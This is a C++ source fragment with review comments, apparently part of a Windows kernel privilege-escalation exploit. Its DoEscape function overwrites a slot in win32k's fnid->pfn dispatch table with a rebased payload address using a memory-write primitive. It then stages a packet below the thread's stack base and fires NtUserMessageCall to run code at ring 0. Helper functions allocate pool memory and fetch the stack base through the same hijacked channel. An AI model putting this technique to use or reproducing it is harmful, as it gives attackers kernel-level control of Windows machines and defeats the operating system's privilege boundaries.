// Requests a pool allocation of `size` bytes through the NtUserMessageCall
// channel, using EX_ALLOCATE_POOL as the selector and m_window->Hwnd() as the
// target window; `size` travels in the message parameter slot.
// Returns whatever the call returns — the failure value is not visible in this
// block, so callers should check it against the kernel-side handler's contract.
// NOTE(review): "Rwe" in the name suggests an executable pool type, but nothing
// here shows which pool is used — confirm against the handler behind EX_ALLOCATE_POOL.
__checkReturn void* ExAllocateRwePool( __in size_t size )
{
    return NtUserMessageCall(m_window->Hwnd(), size, 0, 0, 0, EX_ALLOCATE_POOL);
}
// Installs the entry for selector ACE in win32k's fnid->pfn table and then
// issues the call that dispatches through it. Before the trigger, `packet`
// is copied to just below the current thread's stack base, presumably so the
// kernel-side code can locate it there — not verifiable from this block.
//
// kernelImage: base that SystemMain's address is rebased onto (via RELLOCATE,
//              which presumably translates from CDllModule::ModuleBase()).
// packet:      request block written below the stack base. It is annotated
//              __inout, but this block only reads it; any write-back would
//              have to come from the kernel side and is not visible here.
// Returns false if the stack base could not be obtained or if either
// m_io.Write fails; true once the trigger call has been issued. The trigger's
// own return value is discarded, so `true` does not prove the handler ran.
__checkReturn bool DoEscape( __in const void* kernelImage, __inout extinterface::PACKET& packet )
{
    auto stack_base = GetCurrentThreadStackBase();
    if (!stack_base)
        return false;

    // Address of SystemMain as it will be valid inside kernelImage.
    void* ace = RELLOCATE(SystemMain, CDllModule::ModuleBase(), kernelImage);

    // First write: the table slot at index UNUSED_IND + ACE - 1.
    if (!m_io.Write(&m_win32k->mpFnidPfn()[UNUSED_IND + ACE - 1], &ace, sizeof(ace)))
        return false;

    // Second write: the packet, placed sizeof(packet) bytes below the stack base.
    // NOTE(review): if this write fails, the table slot above has already been
    // changed and is not restored, so the caller gets `false` with a
    // half-applied state.
    if (!m_io.Write(static_cast<char*>(stack_base) - sizeof(packet), &packet, sizeof(packet)))
        return false;

    //cpl0 exec :
    // Dispatch through the slot written above; the result is intentionally ignored.
    (void)NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, ACE);
    return true;
}
// Asks the kernel-side handler selected by PS_GET_CURRENT_THREAD_STACK_BASE
// for the current thread's stack base, over the same NtUserMessageCall channel
// as ExAllocateRwePool (DEFAULT_PARAM in the message parameter slot).
// Returns the call's result unchanged; DoEscape treats a null return as failure.
__checkReturn void* GetCurrentThreadStackBase()
{
    return NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, PS_GET_CURRENT_THREAD_STACK_BASE);
}